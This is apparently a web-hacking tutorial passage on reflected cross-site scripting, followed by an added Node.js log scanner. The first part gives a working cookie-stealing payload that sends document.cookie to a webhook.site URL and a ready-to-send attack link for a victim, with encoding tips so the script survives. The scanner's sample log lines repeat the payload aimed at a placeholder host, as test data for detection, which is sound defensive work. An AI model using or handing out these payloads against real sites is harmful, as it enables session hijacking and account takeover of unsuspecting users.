We can leverage the following website so that we do not need our own webserver. https://webhook.site/
With a webhook in hand, we’re ready to craft our payload. It should look like the following, with [URL] replaced by our generated webhook address.
<script> document.write('<img src="[URL]?c='+document.cookie+'" />'); </script>
Once the browser executes the JavaScript, the resulting <img> tag should look like the following, and loading it sends the cookies to our website:
<img src="[URL]?c=[COOKIE]"/>
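Before sending the link to the victim, make sure you encode the + symbols by replacing them with %2b. A literal + in a query string is decoded as a space by the server, which would break the string concatenation in the script.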
An example payload will look like the following:
http://vulnerable.webapp/index.php?name=<script>document.write('<img src="https://webhook.site/xxx-xxx-xxx/?c='%2bdocument.cookie%2b'" />');</script>
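From the defender's side, requests like the one above are visible in the web server's access log. The following is an added example, not part of the original page: a Node.js check that decodes each query parameter the way PHP does for $_GET and flags values that combine a script tag with a read of document.cookie. The log lines are constructed, and collector.example is a placeholder host.

```javascript
// Added example (not from the original page). Log lines are constructed;
// collector.example is a placeholder for the external host receiving the cookie.
const SAMPLE_REQUESTS = [
  "GET /index.php?name=alice HTTP/1.1",
  // '+' sent as %2b, as the page instructs
  "GET /index.php?name=%3Cscript%3Edocument.write('%3Cimg%20src=%22https://collector.example/x?c='%2bdocument.cookie%2b'%22%20/%3E');%3C/script%3E HTTP/1.1",
  // same payload with a literal '+', which form-decoding turns into a space
  "GET /index.php?name=%3Cscript%3Edocument.write('%3Cimg%20src=%22https://collector.example/x?c='+document.cookie+'%22%20/%3E');%3C/script%3E HTTP/1.1",
];

function inspectRequest(line) {
  const m = /^[A-Z]+ (\S+) HTTP\/\d\.\d$/.exec(line);
  if (!m) return null; // not a request line this check understands
  // Keep everything after the first '?', including any '?' inside a value
  const query = m[1].split("?").slice(1).join("?");
  const findings = [];
  // URLSearchParams form-decodes like PHP's $_GET: %xx -> byte, '+' -> space
  for (const [param, value] of new URLSearchParams(query)) {
    if (!/<script\b/i.test(value)) continue;
    if (!/document\s*\.\s*cookie/i.test(value)) continue;
    // Host the injected tag would load from, i.e. where the cookie would go
    const dest = /\bsrc\s*=\s*["']?(https?:\/\/[^\/"'\s?]+)/i.exec(value);
    findings.push({
      param,
      destination: dest ? new URL(dest[1]).host : null,
      // true only if the '+' survived decoding (it was sent as %2b)
      concatIntact: /\+\s*document\s*\.\s*cookie/i.test(value),
    });
  }
  return findings;
}

// Return only the requests that produced at least one finding
function scan(lines) {
  return lines
    .map((line) => ({ line, findings: inspectRequest(line) }))
    .filter((r) => r.findings && r.findings.length > 0);
}

console.log(JSON.stringify(scan(SAMPLE_REQUESTS).map((r) => r.findings), null, 2));
```

Both payload variants are flagged as attempts; concatIntact separates the one whose script would still run after decoding from the one broken by the unencoded +.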